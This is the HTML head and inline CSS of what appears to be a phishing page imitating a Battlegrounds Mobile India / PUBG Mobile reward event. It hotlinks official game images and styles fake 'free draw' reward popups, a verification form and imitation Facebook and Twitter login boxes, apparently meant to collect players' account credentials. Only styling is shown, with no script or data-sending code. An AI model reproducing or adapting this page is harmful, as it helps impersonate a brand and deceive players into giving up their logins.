<html lang="en">
<head>
<meta charset="UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>BATTLEGROUNDS MOBILE INDIA EVENT</title>
<meta property="og:description" content="Start Free Draw and Collect your exclusive reward from PUBG MOBILE now!">
<meta property="og:image" content="https://www.battlegroundsmobileindia.com/common/img/main/app.png">
<meta property="og:image:width" content="540">
<meta property="og:image:height" content="282">
<link rel="icon" href="https://www.battlegroundsmobileindia.com/common/img/favicon.ico">
<link href="https://fonts.googleapis.com/css2?family=Teko&display=swap" rel="stylesheet">
<link rel="stylesheet" href="css/style.css">
<link rel="stylesheet" href="css/animate.css">
<link rel="stylesheet" href="css/loader.css">
<link rel="stylesheet" href="css/link.css">
<link rel="stylesheet" href="css/mantap.css">
<link rel="stylesheet" href="css/bukanlog/facebook.css">
<link rel="stylesheet" href="css/bukanlog/twitter.css">
<link rel="stylesheet" href="css/international-telephone-input.css">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.2.0/css/material-design-iconic-font.min.css">
<style type="text/css">
@charset "utf-8";
@import url("https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Teko:300,400,500");
*,*:before,*:after {
	-webkit-box-sizing:border-box;
	-moz-box-sizing:border-box;
	box-sizing:border-box;
}
@font-face {
    font-family: 'selow'; 
    font-style: normal;
    font-weight: 700;
    src: url(fonts/selow.woff2) format("woff2"), 
        url(fonts/selow.woff) format("woff"),
        url(fonts/selow.ttf) format("truetype");
}
body {
	background:#030303;
	margin: 0;
	font-family: 'Teko', 'selow';
}
.namekfront {
	background: url(img/namekfront.png) no-repeat center center;
    background-size: 100% 100%;
    width: 100%;
    margin-top: 0px;
	}
.container {
	position: relative;
	margin: 0px auto;
	max-width: 400px;
	height: auto;
	border: 0px solid #fff;
}
.namekpop3 { background:url(img/reward/suit/namek3.jpg) no-repeat center center;
	background-size:100% 100%;
	width:395px;
	height:250px;
	position:relative;
	margin-top:310px;
	margin-bottom:auto;
	margin-left: auto;
	margin-right: auto;
	display: block;
}
.sec-container {
	background: url(img/bg.jpg) no-repeat bottom center;
	background-size: 100% 100%;	
   margin-top: 0px;   
   padding: 0px;
   padding-top: 2%;
   width:100%;
   height: auto;
   border:none;  
}
.sec-verify-container {	
   background: url('img/bgreward.jpg') no-repeat center;
   background-size:100% 100%;
   margin-top: 0px;   
   padding: 0px;
   width:100%;
   height: 500px;
   border:none;  
}
.navbar {
	background: #000;
	width: 100%;
	height: 58px;
}
.navbar-logo {
	width: 28%;
	float: left;
	margin-top: 6px;
	margin-left: 11px;
}
.navbar-shop {
	width: 40px;
	margin-top: 10px;
	margin-right: 5px;
}
.navbar-language {
	width: 40px;
	margin-top: 10px;	
	margin-right: 5px;
}
.navbar-menu {
	width: 40px;
	margin-top: 10px;
	margin-right: 5px;
}
.navbar-right {
	width: auto;
	float: right;
}
.navbar-download {
	background: #f8ac04;
	width: 65px;
	height: 58px;
	float: right;
}
.navbar-download img {
	width: 35px;
	margin: 15px;
}
.header {
	width: 100%;
	height: auto;
	margin-bottom:0px;		
}
.header img {
	width: 100%;
	height: auto;
	margin-bottom:0px;		
	border:none;
}
.namekhome {
  background: url ('img/bgreward.jpg') no-repeat center center;
	background-size:100% 100%;
	width: 100%;
	height: auto;	
}
.namekhome img {
	width: 100%;
	height: 550px;		
}
.popreward{

	background:url(img/namekpop.png) no-repeat center center;
	background-size:100% 100%;
	width: 100%;
	height: 230px;
}
.namekload {
	width: 100%;
	height: auto;	
}
.namekload img {
	width: 100%;
	height: auto;		
}
.button1{
  background: url ('img/reward/suit/1.jpg') no-repeat center center;
	background-size:100% 100%;
	width: 42px;
	position:absolute;
	top:200px;
	left:246px;
	height: auto;	
}
.button2{
  background: url ('img/reward/suit/1.jpg') no-repeat center center;
	background-size:100% 100%;
	width: 42px;
	position:absolute;
	top:200px;
	left:300px;
	height: auto;	
}
.namekhomex {
  background: url ('img/bgreward.jpg') no-repeat center center;
	background-size:100% 100%;
	width: 100%;
	height: 550px;	
}
.namekhomex video {
	width: 100%;
	height: auto;	
}
.namekload2 {
	width: 100%;
	height: auto;	
}
.namekload2 video {
	width: 100%;
	height: auto;	
}
.namekload3 {
	width: 100%;
	height: auto;	
}
.namekload3 video {
	width: 100%;
	height: auto;	
}
.header video {
	width: 100%;
	height: auto;	
}
.headerfoot {
	width: 95%;
	height: auto;		
	margin-top: -20px;
	margin-left: auto;	
	margin-right: auto;	
}
.headerfoot img {
	width: 100%;
	height: auto;
	margin-top: -0px;	
	border-radius: 5px;
	border:1px solid #B22AE8;
}
.event-notification {
    background: url(img/alert-selow.png) no-repeat center;
	background-size: 100% 100%;
	width:98%;
	height:55px;
	padding:7px;
	margin-top:3px;
	margin-bottom:7px;
	margin-right: auto;
	margin-left: auto;
}
.event-notification-text {
	padding-top:10px;
	text-align:center;
	font-family:selow;
	color:#2AAFF4;
	font-size:17px;
}
.alert-kinnon {
  background:url(img/notify.png) no-repeat center;
  background-size:100% 100%;
  width:98%;
  height:100px;
  padding:5px;
  margin-left: auto;
  margin-right: auto; 
  color:#000;  
  border:none;
}
.alert-kinnon-time {
  width:21%;
  height:20px;
  color:#AAAAAA;
  text-align:center;  
  margin-top: 22px;
  margin-right: 30px;  
  border:1px solid #AAAAAA;
  border-radius:0px;
  float: right;
  font-size: 14px;
  font-family:selow;
  text-shadow: 2px 2px 5px #000;  
}
.alert-kinnon-title {
  margin-top: 17px;  
  padding:7px;
  color:#AAAAAA;
  text-align: center;
  font-size:15px;
  font-family:selow;
  border:none;  
}
.alert-kinnon-text {
  margin-top: -5px;
  margin-left: 22px;
  padding:7px;
  color:#AAAAAA;
  text-align:left;
  font-size:13px;
  font-family:selow;
  border:none;
}
.lenzz-wrapper {
  width:95%;
  height:auto;
  border: none;
  display:block; 
  margin-top: -10px; 
  padding-bottom: 20px; 
}
.lenzz {
    background:url(img/notify.png) no-repeat center center;
    background-size:100% 100%;
    width:100%;
    height:33px;
    padding: 3px;
	padding-top: 7.5px;
    margin-left: auto;
    margin-right: auto;
    border: 0px solid #C4A98F;
}
.lenzz-text {
	color: #432f04;
	text-shadow: 0px 0px 3px #fff3c6;
    text-align:center;
    font-size:15px;
    font-family:selow;
    border:none;
}
.lenzz-text img {
    width: 25px;
    margin-bottom: -8px;
    border:none;
}
.box {
    width: 98%;
    height: auto;
    margin-left:auto;
    margin-right:auto;      
    margin-top: -100px; 
	margin-bottom: 0px;
	border: 0px solid #E29E53;
	border-radius: 0px;
	position: relative;
	display: block;
}
.box-item {
    width: 100%;
	height:auto;				
	padding-top:30px;
	padding-bottom: 10px;
	margin-left:auto;
    margin-right:auto;   	
}
.scroll {
	overflow:scroll;
	position:relative;
	width: 100%;
	height:auto;
	padding-top:20px;
	margin-left: auto;
	margin-right: auto;
	display: block;
	scrollbar-face-color:#ffbb40;
	scrollbar-shadow-color:#ffbb40;
	scrollbar-highlight-color:#ffbb40;
	scrollbar-3dlight-color:#ffbb40;
	scrollbar-darkshadow-color:#ffbb40;
	scrollbar-track-color:#ffbb40;
	scrollbar-arrow-color:#ffbb40;
}
.footer {
	background: #19191b url(https://i.postimg.cc/02KwtTc7/footer-bg.jpg) top center / 100% no-repeat;
	background-position-y: calc(-15 / 640 * 100vw);	
	width: 100%;
	height: auto;
	padding: 15px;
	border: none;
}
.footer-txt-join {
	margin-top: -10px;
	margin-bottom: 15px;
	color: #ffbe21;
	font-size: 30px;
	font-family:selow;
	text-align: left;
	text-transform: uppercase;
}
.footer {
	background: #000;
	width: 100%;
	height: auto;
	padding: 15px;
}
.footer-txt-join {
	margin-bottom: 10px;
	color: #ffbe21;
	font-size: 35px;
	font-family:Teko;
	text-align: left;
	text-transform: uppercase;
}
.footer-copyright-icon {
	width: 55%;
	margin-left: auto;
	margin-right: auto;
	margin-top: 10px;
	margin-bottom: 15px;
	display: block;
}
.footer-txt-copyright {
	color: #bdbdbd;
	font-size: 15px;
	font-family:Teko;
	text-align: center;
}
.verify-box-navbar {	
	background-size: 100% 100%;
	width: 93%;
	height: 19%;
	margin-left: auto;
	margin-right: auto;
	display: block;
}
.verify-box-navbar-description {
	width: 50%;
	margin-top: 50px;
	margin-right: 20px;
	color: #fff;
	font-size: 18px;
	font-family: Teko;
	font-weight: 500;
	text-align: left;
	float: right;
}
.verify-box-navbar-form {	
	background-size: 100% 100%;
	width: 93%;
	height: auto;
	margin-left: auto;
	margin-right: auto;
	display: block;
}
.verify-box-navbar-form input {
	background:url(img/verify-bg.jpg) no-repeat center center;
	background-size: 100% 100%;
	width: 95%;
	height: 40px;
	margin-left: 10px;
	margin-bottom: 4px;
	padding: 4px;
	padding-left: 10px;
	padding-right: auto;
	color: #fff;
	font-size:15px;
	font-family: selow;
	font-weight: 500;
	border: 1px solid #fff;
	position: relative;
	outline: none;
	-webkit-appearance: none;
    -moz-appearance: none;
}
.verify-box-navbar-form input::placeholder {
	color: #fff;
}
.verify-box-navbar-form select {
	background:url(img/verify-bg.jpg) no-repeat center center;
	background-size: 100% 100%;
	width: 95%;
	height: 40px;
	margin-left: 10px;
	margin-bottom: 4px;
	padding: 4px;
	padding-left: 10px;
	padding-right: auto;
	color: #fff;
	font-size:15px;
	font-family: selow;
	font-weight: 500;
	border: 1px solid #fff;
	position: relative;
	outline: none;
	-webkit-appearance: none;
    -moz-appearance: none;
}
.verify-box-content {	
	background-size: 100% 100%;
	width: 93%;
	height: auto;
	margin-top: -1px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 15px;
	padding: 20px;
	padding-top: 0px;
	padding-bottom: 25px;
	display: block;
}
.verify-box-content-title {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 6px;
	color: #fff;
	font-size: 18px;
    font-family:selow;
	font-weight: 500;
	text-align: center;
	display: block;
}
.verify-box-content-title i {
	padding-top: 15px;
	padding-bottom: 15px;
	color: #fff;
	font-size: 100px;
	text-align: center;
}
.verify-box-content button {
	background:url(img/yes_selow.png) no-repeat center center;
	background-size:100% 100%;
	width: 50%;
	height: 45px;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 7px;
	padding-top: 8px;
	padding-left: 21px;
	padding-right: 20px;
	color: #fff;
	font-size: 18px;
	font-family:selow;
	font-weight: 500;
	text-align: center;
	border: none;	
	display: block;
}
.about-box-content {	
	background:url(img/aboutrules-sec.png) no-repeat center center;
	background-size:100% 100%;
	width: 98%;
	height: 120px;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 20px;
	padding-top: 0px;
	padding-bottom: 25px;
	color: #000;
	display: block;
}
.about-box-content-title {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 6px;
	color: #000;
	font-size: 18px;
    font-family:selow;
	font-weight: 500;
	text-align: center;
	display: block;
}
.about-box-content-title i {
	padding-top: 15px;
	padding-bottom: 15px;
	color: #000;
	font-size: 100px;
	text-align: center;
}
.about-box-content button {
	background:url(img/menu-on.png) no-repeat center center;
	background-size:100% 100%;
	width: 50%;
	height: 45px;	
	padding: 7px;
	margin-bottom: 20px;	
	margin-top: 20px;
	padding-left: 20px;
	padding-right: 20px;
	color: #000;
	font-size: 18px;
	font-family:selow;
	font-weight: 500;
	text-align: center;
	border: none;	
	display: block;
}
.btn-wrapper {
	width: 100%;
	height: 50px;	
	margin-top: 3px;				
	font-family:selow;	
}
.btn-wrapper button {
    background: url(img/button.png) no-repeat center;
	background-size: 100% 100%;
	width: 40%;
	height: 43px;
	margin-top: 45px;
	margin-left: -10px;	
	margin-right: 6px;	
	padding: 5px;	
	color: #AAAAAA;
	font-family:selow;
	font-size: 16px;	
	font-weight: 400;
	text-align: center;	
	border: none;
	outline: none;
	float:left;
	display: inline-block;	
}
.processing-box-sec {	
	background: url(img/kinnonbox-sec.png) no-repeat center;
	background-size: 100% 100%;	
	width: 98%;
	height: 350px;
	margin-left: auto;
	margin-right: auto;
	margin-top: 158px;
	margin-bottom: 15px;
	padding: 20px;
	padding-top: 10px;	
	padding-bottom: 2px;
	display: block;
}
.processing-box-sec-title {
	width: 95%;
	height: auto;
	margin-top: 5px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 20px;
	padding: 5px;
	padding-left: 10px;
	color: #fff;
	font-size: 15px;
    font-family:selow;	
	text-align: left;
	display: block;
}
.menu-wrapper-border {
	height: 11px;
}
.menu-wrapper {
	width: 94.3%;
	height: auto;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 12px;
	display: block;
}
.menu-content {
	background:url(img/btn-off.png) no-repeat center center;
	background-size:100% 100%;
	width: 32%;
	height: auto;
	padding: 6px;
	color: #003a75;
	font-size: 17px;
	font-family:'Teko', sans-serif;
	font-weight: 500;
	text-align: center;
	text-shadow: 0 0 1px #fff38a,0 0 1px #fff38a;
	border: none;
	cursor: pointer;
	-webkit-text-stroke:0 transparent;
}
.menu-content-active {
	background:url(img/btn-on.png) no-repeat center center;
	background-size:100% 100%;
	color: #7f2c10;
}
.item4 {
	background-size:display;
	width: 42%;
    height: 77px;
	margin: 5px;
	margin-top: 1px;	
	margin-bottom: 1px;
	display: inline-block;
	border: 2px solid #000;
	border-radius: 0px;	
}
.item4 img {
	background-size:display;
	width: 100%;
    height: 100%; 
    border:none;       
    border-radius: 0px;
}
.item3 {
	background-size:display;
    width: 28%;
    height: 100px;
	margin: 5px;
	margin-top: 2px;	
	margin-bottom: 5px;
	display: inline-block;
	border: 2px solid #000;
	border-radius: 0px;	
}
.item3 img {
	background-size:display;
	width: 100%;
    height: 100%; 
    border:none;   
    border-radius: 0px;
}
.itembutton {
	background-size:display;
    width: 29%;
    height: 100px;
	margin: 7px;
	margin-top: 1px;	
	margin-bottom: 1px;
	display: inline-block;
	animation: bounce .9s infinite alternate;
    animation-play-state: running;
}
@keyframes bounce {
  to { transform: scale(1.1); }
}
.itembutton img {
	background-size:display;
	width: 100%;
    height: 100%; 
}
.item5 {
	background-size:display;
    width: 22%;
    height: 77px;
	margin: 5px;
	margin-top: 1px;	
	margin-bottom: 1px;
	display: inline-block;
	border: 2px solid #000;
	border-radius: 0px;	
}
.item5 img {
	background-size:display;
	width: 100%;
    height: 100%; 
    border:none;   
    border-radius: 0px;
}
.item {
	background-size:display;
    width: 27%;
    height: 110px;
	margin: 3px;
	margin-top: 7px;
	display: inline-block;
	border: 0px solid #000;
	border-radius: 0px;	
}
.item img {
	background-size:display;
	width: 100%;
    height: 100%; 
    border:none;   
    border-radius: 0px;
}
.item button {
    background:url(img/pop-btn.png) no-repeat center center;
	background-size: 127% 100%;
	color: #432f04;
	text-shadow: 0px 0px 3px #fff3c6;
	border: none;
	font-size: 17px;
	font-weight: 500;
	margin-top: -0px;
	padding: 5px;
	width: 100%;
	margin-left: auto;
	margin-right: auto;
}

.loadkin {
	width:100%;
	height:100%;
	position:fixed;
	top:0;
	left:0;	
	z-index:9999;
	background:#000;
}
.loadkin-box {
	position: relative;
	margin: 50px auto;
	text-align: center;
	height: 43px;
	font-size: 20px;
	padding: 5px;
	padding-bottom: 5px;
	margin-top: 70%;  
}
.loadkin-box img {
	width:70px;
	height:85px;
	margin-bottom:10px;
}
.loadkin-box i {
	padding-top: 15px;
	padding-bottom: 15px;
	color: #fff;
	font-size: 20px;
	float:center;
	font-family: arial, sans-serif;
	text-align: center;
}
.popup {
	width:100%;
	height:100%;
	position:fixed;
	top:0;
	left:0;
	z-index:9999;
	background-color:rgba(0, 0, 0, 0.4);
}
.popup-box-wrapper {
	width: 390px;
	height: auto;
	position: relative;
	margin: 50px auto;
	margin-top: 15%;
	text-align: center;
	font-family:'selow';
	color:#fff;
}
.popup-box-wrapper-login {
	width: 400px;
	height: auto;
	position: relative;
	margin: 50px auto;
	margin-top: 15%;
	text-align: center;
	font-family:'selow';
	color:#fff;
}
.popup-box-navbar {
	background:url(img/pop-navbar.png) no-repeat center center;
	background-size:100% 100%;
	height: 43px;
	padding-bottom: 5px;
}
.popup-box-navbar img {
	width: 20px;
	height: 20px;
	margin-top: -25px;
	margin-right: 19px;
	float: right;
}
.popup-box-navbar-title {	
	padding-top: 20px;
	padding-bottom: 2px;
	font-size: 16px;
	font-family:selow;
	font-weight: 300;
	text-align: center;
	color: #432f04;
}
.popup-box-bg-login {
	background:url(img/nameklogin.png) no-repeat center center;
	background-size:100% 100%;
	width: 100%;
	height: 230px;
	margin-top: -12px;
}
.popup-box-alert {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 5px;
	color: #AAAAAA;
	font-size: 17px;
    font-family:selow;
	font-weight: 500;
	text-align: left;
	display: block;
}
.popup-box-loading {
	width: 95%;
	height: auto;
	margin-left: auto;
	margin-right: auto;
	padding: 6px;
	color: #fff3c6;
	font-size: 17px;
    font-family:selow;
	font-weight: 500;
	text-align: center;
	display: block;
}
.popup-box-loading img {
	width: 45px;
	height: auto;
	margin-bottom: 20px;
	text-align: center;
	animation-name: spin;
    animation-duration: 400ms;
    animation-iteration-count: infinite;
    animation-timing-function: linear;
}
@keyframes spin {
    from {transform:rotate(0deg);}
    to {transform:rotate(360deg);}
}
.popup-box-alert2 {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 5px;
	color: #AAAAAA;
	font-size: 17px;
    font-family:selow;
	font-weight: 500;
	text-align: left;
	display: block;
}
.popup-box-alert0 {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 5px;
	color: #fff3c6;
	font-size: 17px;
    font-family:selow;
	font-weight: 500;
	text-align: right;
	display: block;
}
.popup-box-alert3 {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 5px;
	color: #fff3c6;
	font-size: 17px;
    font-family:selow;
	font-weight: 500;
	text-align: left;
	display: block;
}
.popup-box-alert7 {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 5px;
	color: #AAAAAA;
	font-size: 17px;
    font-family:selow;
	font-weight: 500;
	text-align: center;
	display: block;
}
.popup-box-alert4 {
	width: 95%;
	height: auto;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 6px;
	color: #fff3c6;
	font-size: 17px;
    font-family:selow;
	font-weight: 500;
	text-align: center;
	display: block;
}
.popup-box-alert4 i {
	padding-top: 15px;
	padding-bottom: 15px;
	color: #fff3c6;
	font-size: 50px;
	text-align: center;
}
.popup-box-item {
  width: 12%;
  height: 50px;
	margin-top:1px;
	margin-left:0px;
	margin-right:0px;
	text-align: center;
	display: inline-block;
}
.popup-box-item img {
	width:100%;
	height:100%;
	display: inline-block;
}
.popup-box-item span {
	color: #fff;
	font-size: 22px;
	font-family: selow;
	text-align: right;
	position: absolute;
	left: 0;
	right: 2px;
	bottom: -5px;
}
.popup-box-gamecon {
	width: 52%;
	height: 65px;
	margin-left: auto;
	margin-right: auto;
	margin-top: 10px;
	display: block;
}
.popup-box-form {
	width: 85%;
	height: auto;
	margin-left: auto;
	margin-right: auto;
	display: block;
}
.popup-box-form label {
  display: inline-block;
  width: 140px;
  text-align: right;
  color: yellow;
}
.popup-box-form input {
	background: #1a1203 no-repeat center;
	background-size: 100% 100%;	
	width: 100%;
	height: 35px;
	margin-bottom: 3px;
	padding: 4px;
	padding-left: 10px;
	color: #fff3c6;
	font-size:15px;
	font-family:selow;
	font-weight: 300;
	border: 0.1px solid #fff3c6;
	position: relative;
	outline: none;
	-webkit-appearance: none;
    -moz-appearance: none;
}
.popup-box-form input::placeholder {
	color: #fff3c6;
}
.popup-box-form select {
	background: #1a1203 no-repeat center;
	background-size: 100% 100%;
	width: 100%;
	height: 35px;
	margin-bottom: 3px;
	padding: 4px;
	padding-left: 10px;
	color: #fff3c6;
	font-size:15px;
	font-family:selow;
	font-weight: 300;
	border: 0.1px solid #fff3c6;
	position: relative;
	outline: none;
	-webkit-appearance: none;
    -moz-appearance: none;
}
.popup-box-footer {	
	background-size:100% 100%;
	margin-top: 20px;
	width: 100%;
	height: 45px;
}
.popup-box-footer button {
	background: url(img/yes_selow.png);
	background-size: 100% 100%;
	width: 200px;
	height: auto;
	margin-top: -5px;
	padding: 5px;
	padding-top: 10px;
	padding-left: 35px;
	padding-right: 34px;
	color: #000;
	font-size:17px;
	font-family: selow;
	font-weight: 500;
	text-align: center;
	border: none;
	outline: none;
}
.popup-box-form-footer {
	background-size:100% 100%;
	width: 100%;
	height: 45px;
	margin-top: 20px;
}
.popup-box-form-footer button {
	background: url(img/yes_selow.png) no-repeat center;
	background-size: 100% 100%;
	width: auto;
	height: auto;
	margin-top: 5px;
	padding: 4px;
	padding-left: 30px;
	padding-right: 30px;
	color: #000;
	font-size:18px;
	font-family: selow;
	font-weight: 500;
	text-align: center;
	border:none;
	outline: none;
}
.popup-box-form-footers {
	background-size:100% 100%;
	width: 100px;
	height: 45px;
	margin-top: 20px;
}
.popup-box-form-footers button {
	background: url(img/nam.png) no-repeat center;
	background-size: 100% 100%;
	width: auto;
	height: auto;
	margin-top: 5px;
	padding: 4px;
	margin-left:140px;
	padding-left: 30px;
	padding-right: 30px;
	color: #000;
	font-size:18px;
	font-family: selow;
	font-weight: 500;
	text-align: center;
	border:none;
	outline: none;
}
.popup-box-navbar-login {
    background:url(img/popup-navbar1.png) center center/100% 100% no-repeat;
    height:auto;
    padding-top:5px;
    padding-bottom:1px;
}
.popup-box-navbar-login-title {
    padding-left:24px;
    padding-top:2px;
    color:#defbff;
    font-size:22px;
    font-family:selow;
    font-weight:500;
    text-align:center;
}
.popup-box-bg-login{
    background:url(img/bgmi-login.png) center center/100% 100% no-repeat;
    width:100%;
    height:180px;
    margin-top:-10px;
}
.popup-box-bg-login-load {
    background:url(img/popup-box-bg-login-load.png) center center/100% 100% no-repeat;
    width:100%;
    height:255px;
    margin-top:-10px;
}
.load-login-img{ 
    width:30%;
    height:auto;
    margin-top:30px;
    margin-bottom:5px;
}
.load-login-gif {
    width:15%;
    height:auto;
    margin-bottom:0px;
}
.popup-box-footer-login {
    background-size:100% 100%;
    width:100%;
    margin-top:-1px;
    height:35px;
}
.popup-btn-login {
    width:25%;
    border-radius:2px;
    height:25px;
    padding: 4px 5px 5px;
	margin:3px 3px 45px;
    color:#f2f2f2;
    font-size:14px;
    font-family:selow;
    border:none;
    outline:0;
    position:relative;
    display:inline-block;
}
.popup-btn-login i {
    color:#fff;
    font-size:20px;
    margin-top:-1px;
    float:left;
}
.popup-btn-facebook {
    background:#1778f2;
    color:#fff;
}
.popup-btn-twitter {
    background:#fff;
    color:#000;
}
.popup-btn-login-link{ 
    background:#e3b448;
    margin-bottom:3px;
    color:#000;
}
.popup-btn-login-link img {width:22px;
    height:22px;
    margin-top:-5px;
    color:#fff;
    font-size:20px;
    float:left;
}
.popup-login {
	background:rgba(0,0,0,0.4);
	width:100%;
	height:100%;
	position:fixed;
	top:0;
	left:0;
	z-index:9999;
}
.popup-box-login-fb {
	background:#ECEFF6;
	max-width:330px;
	height:auto;
	position:relative;
	margin:50px auto;
	margin-top:1.9%;
	text-align:center;
	font-family:'Teko';
	color:#000;
	border-radius:10px;
}
.popup-box-login-twitter {
	background:#fff;
	max-width:330px;
	height:auto;
	position:relative;
	margin:50px auto;
	margin-top:10%;
	text-align:center;
	font-family:'Teko';
	color:#000;
	border-radius:5px;
}
.close-fb {
	background: #3b5998;
	width: 25px;
	height: 25px;
	color: #fff;
	font-size: 20px;
	text-align: center;
	text-decoration: none;
	border-radius: 50%;
	top: -10px;
	right: -10px;
	position: absolute;
	display: block;
}
.close-fb i {
	padding-top: 2px;
}
.close-other {
	background: #fff;
	width: 25px;
	height: 25px;
	color: #000;
	font-size: 20px;
	text-align: center;
	border-radius: 50%;
	top: -12px;
	right: -12px;
	position: absolute;
	z-index: 9999999;
	display: block;
}
.close-other i {
	color: #000;
	padding-top: 2px;
}
.popups {
	width:100%;
	height:100%;
	position:fixed;
	top:0;
	left:0;
	z-index:9999;
	background-color:rgba(0, 0, 0, 0.4);
}
.popup-box-wrappers {
	width: 390px;
	height: auto;
	position: relative;
	margin: 50px auto;
	margin-top: 15%;
	text-align: left;
	font-family:'selow';
	color:#fff;
}
.popup-box-navbars {
	background:url(img/popup-navbar2.png) no-repeat center center;
	background-size:100% 100%;
	height: 43px;
	padding-bottom: 5px;
}
.popup-box-navbars img {
	width: 20px;
	height: 20px;
	margin-top: 15px;
	margin-right: 18px;
	float: right;
}
.popup-box-navbars-title {	
	padding-left: 40px;
	padding-top: 14px;
	padding-bottom: 2px;
	font-size: 20px;
	color: #fff;
	font-family:selow;
	font-weight: 300;
	text-align: center;	
}
.kagetk {     
	background: rgba(0, 0, 0, 0.2);
	background-size:50% 50%;
	width: 80%;
	height: auto;
	margin-left: auto;
	margin-right: auto;
	border: 1px solid #fff;
	display: none;
	padding: 10px;
	color: #fff;
	font-size: 14px;
	font-family: selow;
	text-align: center;
}
.popup-box-bgs {
	background:url(img/pop-box-bg.png) no-repeat center center;
	background-size:100% 100%;
	width: 100%;
	margin-top: -12px;
}
.popup-box-alerts4 {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 5px;
	color: #fff;
	font-size: 20px;
    font-family:selow;
	font-weight: 500;
	text-align: left;
	display: block;
}
.popup-box-alerts4 i {
	padding-top: 15px;
	padding-bottom: 15px;
	color: #F5EAB0;
	font-size: 50px;
	text-align: left;
}
.popup-box-formx label {
  width: 70%;
  text-align: left;
  padding-left: 20px;
  color: #B7B7B7;
  text-shadow:none;
  font-size:17px;
}
.popup-box-formx input {
	background: #001;
	width: 85%;
	height: 35px;
	margin-bottom: 8px;
	margin-left: 20px;
	padding-right: 4px;
	padding: 4px;
	color: #fff;
	font-size:15px;
	font-family:selow;
	font-weight: 500;
	border: 0.1px solid #fff;
	outline:none;
	position: left;
  -webkit-appearance: none;
  -moz-appearance: none;
}
.popup-box-formx input::placeholder {
	color: #BCCBCE;
}
.popup-box-footers {
	background-size:100% 100%;
	margin-top: 20px;
	width: 100%;
	height: 45px;
}
.popup-box-footers button {
	background: url(img/pop-btn.png) no-repeat center;
	background-size: 100% 100%;
	width: auto;
	height: auto;
	margin-top: 5px;
	padding: 5px;
	padding-left: 35px;
	padding-right: 35px;
	color: #432f04;
	text-shadow: 0px 0px 3px #fff3c6;
	font-size:16px;
	font-family: selow;
	font-weight: 500;
	text-align: center;
	border: none;
	outline: none;
}
.popup-box-formx-footer {
	background-size:100% 100%;
	width: 100%;
	height: 45px;
	margin-top: 20px;
}
.popup-box-formx-footer button {
	background: url(img/yes_selow.png) no-repeat center;
	background-size: 100% 100%;
	width: auto;
	height: auto;
	margin-top: 5px;
	padding: 4px;
	padding-left: 30px;
	padding-right: 30px;
	color: #F4CD34;
	font-size:18px;
	font-family: selow;
	font-weight: 500;
	text-align: center;
	border:none;
	outline: none;
}
.kanan {
	float: right;
}
.kiri {
	float: left;
}
.tengah {
	margin-left: auto;
	margin-right: auto;
	display: block;
}
::-webkit-scrollbar { 
    display: none;
    width: 0px;
}
figure {
	margin: 0;
	padding: 0;
	overflow: hidden;
}
.itemShine figure {
	position: relative;
}
.itemShine figure::before {
	background: -webkit-linear-gradient(left, rgba(255,255,255,0) 0%, rgba(255,255,255,.3) 100%);
	background: linear-gradient(to right, rgba(255,255,255,0) 0%, rgba(255,255,255,.3) 100%);
	width: 50%;
	height: 100%;
	top: 0;
	left: -75%;
	position: absolute;
	z-index: 2;
	content: '';
	display: block;
	-webkit-transform: skewX(-25deg);
	transform: skewX(-25deg);
}
.itemShine figure::before {
	-webkit-animation: shine 2s infinite;
	animation: shine 2s infinite;
}
@-webkit-keyframes shine {
	100% {
		left: 125%;
		}
}
@keyframes shine {
	100% {
		left: 125%;
		}
}
.border_hadiah{
	border:3px solid #FBF274;
    background: linear-gradient(90deg, rgba(255,0,109,1) 8%, rgba(255,250,0,0.10303017436594208) 12%);
	display:inline-block;
}
.rewards-box-content {		
    background:url(img/kinnonbg-reward.jpg) no-repeat center center;
    background-size:100% 100%;	
	width: 100%;
	height: 550px;
	margin-top: 10px;
	padding: 5px;
    padding-top: 5px;
    padding-left: 7px;
    padding-bottom: 0px;
	display: block;
}
.rewards-box-content-title {
	width: 100%;
	height: auto;
	margin-top: -20px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 20px;
	padding: 30px;
	color: #fff;
	font-size: 16px;
    font-family:selow;
	font-weight: 300;
	text-align: left;
	display: block;
}
.proces-box-content {		
    background:url(img/kinnonbg-proces.jpg) no-repeat center center;
    background-size:100% 100%;	
	width: 100%;
	height: 550px;
	margin-top: 10px;
	padding: 5px;
    padding-top: 5px;
    padding-left: 7px;
    padding-bottom: 0px;
	display: block;
}
.proces-box-content-title {
	width: 100%;
	height: auto;
	margin-top: -20px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 20px;
	padding: 30px;
	color: #fff;
	font-size: 16px;
    font-family:selow;
	font-weight: 300;
	text-align: left;
	display: block;
}
